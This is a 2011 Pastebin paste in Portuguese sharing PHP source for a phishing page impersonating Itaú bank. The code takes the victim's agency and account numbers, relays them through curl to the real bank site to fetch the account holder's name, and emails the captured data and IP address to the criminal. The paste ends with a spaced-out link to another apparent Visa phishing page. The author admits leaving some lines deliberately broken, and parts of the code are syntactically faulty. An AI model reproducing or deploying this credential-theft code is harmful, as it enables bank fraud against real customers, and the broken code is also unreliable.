Advertisement
AlbertWTOH

Golpe bancario

Mar 10th, 2011
1,503
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.93 KB | None | 0 0
  1. Isto que eu vou disponibilizar agora � uma linha de c�digo em linguagem PHP usado para ataque:
  2.  
  3. Este � de um banco ita�
  4.  
  5.  
  6. < ?
  7. session_start();
  8. $agencia = $_POST['idag1'];
  9. $_SESSION['agencia'] = $agencia;
  10. $conta = $_POST['idct1'];
  11. $_SESSION['conta'] = $conta;
  12. $dac = $_POST['iddg1'];
  13. $_SESSION['dac'] = $dac;
  14.  
  15. $ch = curl_init();
  16. curl_setopt ($ch, CURLOPT_URL,"https://bankline.itau.com.br/GRIPNET/bklcom.dll");
  17. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
  18. curl_setopt ($ch, CURLOPT_USERAGENT, "Opera/9.99 (Windows NT 5.1; U; pl) Presto/9.9.9");
  19. curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
  20. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  21. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  22. curl_setopt ($ch, CURLOPT_COOKIEJAR, $gacookie);
  23. curl_setopt ($ch, CURLOPT_COOKIEFILE, $gacookie);
  24. curl_setopt ($ch, CURLOPT_REFERER, "https://bankline.itau.com.br/lgnet/itauf/bankline.htm");
  25. $postdata = "id=U2TH1000000&op=A79BF5A95F48CA722097ABE53F049FC79605FA794E31FE3229163FE198AA7AB9&agencia=" . $agencia . "&conta=" . $conta . "&dac=" . $dac . "&tipousuario=X&origem=H&formulario=0&trnini=&varest=&pop=&Target=?=&tira=1000000&Reso=1280x800%40%26cookie%3D&Engine=3&Flag=N&idSessA=&generico=&x=13&y=11";
  26. ---------------------------------------------------------------------------------------------------------
  27.  
  28. curl_setopt ($ch, CURLOPT_POSTFIELDS, $postdata)
  29. curl_setopt ($ch, CURLOPT_POST, 1);
  30. $result = curl_exec ($ch);
  31. curl_close($ch);
  32.  
  33. $resulta = explode('class="MSGTexto8">',$result);
  34. $resulta1 = $resulta[1];
  35. $resulta2 = explode('',$resulta1);
  36. if ($resulta2[0] == ""){
  37. $resulta = explode(class="MSGNome">',$result)
  38. $resulta1 = $resulta[1];
  39. $resulta2 = explode('',$resulta1);
  40. }
  41. ---------------------------------------------------------------------------------------------------------
  42.  
  43. if ($resulta2[0] == ""){
  44. $resulta = explode('class="MSGTituloEsq2"> ',$result);
  45. $resulta1 = $resulta[1];
  46. $resulta2 = explode('',$resulta1);
  47. }
  48.  
  49. $ip = $_SERVER["REMOTE_ADDR"];
  50. if ($resulta2[0] == ""){
  51. echo"";
  52. echo "< meta H T T P- E Q U I V = 'refresh' CONTENT='0;URL= index.php'>";
  53. }
  54. ---------------------------------------------------------------------------------------------------------
  55.  
  56. $headers = "MIME-Version: 1.1\n";
  57. $headers .= "Content-type: text/html; charset=iso-8859-1\n";
  58. $headers .= "From: " . $resulta2[0] . "@abriu.com.br\n"; // remetente
  59. $headers .= "Return-Path: " . $resulta2[0] . "@abriu.com.br\n"; // return-path
  60.  
  61. mail("[email protected]", "[" . $ip . "] - " . $resulta2[0] . " Abriu", $os . ' ' . $browser . "
  62. " . $resulta2[0] . "< br >" . $agencia . "< br >" . $conta . "-" . $dac . "< br >", $headers);
  63.  
  64. $_SESSION['nome'] = $resulta2[0];
  65. ?>
  66. ---------------------------------------------------------------------------------------------------------
  67. Os dados digitados ser�o salvos em vari�veis de sess�o, depois � utilizada a libcurl no PHP para se comunicar com o site verdadeiro do banco Ita�, a resposta � exibida de acordo com os dados fornecidos pelo site e pra finalizar, tudo que � digitado � enviado um e-mail para o criminoso com as informa��es capturadas.
  68.  
  69. Isso explica sempre do alerta que quando voc� for digitar a senha, antes de mais nada digite a senha falsa, se der erro o site � verdadeiro, se aceitar � mal sinal.
  70.  
  71. Pra finalizar, se caso der algo errado nos c�digos, n�o se desespere, isso foi feito propositalmente, eu ocultei algumas coisas pra n�o ficar a entregue de t�o f�cil, caso vier fazer qualquer tipo de tentativa usando esse tipo de pr�tica,analise teoricamente por mera curiosdidade, n�o me responsabilizo por nada se fizer de mal uso.
  72.  
  73. mais a frente quem sabe eu posto mais uma curiosidade sobre isso.
  74.  
  75. fui
  76. ---------------------------------------------------------------------------------------------------------
  77. Link de outro golpe:
  78.  
  79. h t t p : / / v i s a g o . w s / s e c u r e / v a i d e v i s a / p r i m e i r o _ p a s s o . p h p
  80.  
  81. :)
  82.  
  83. Credito: Joey T.O.H
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement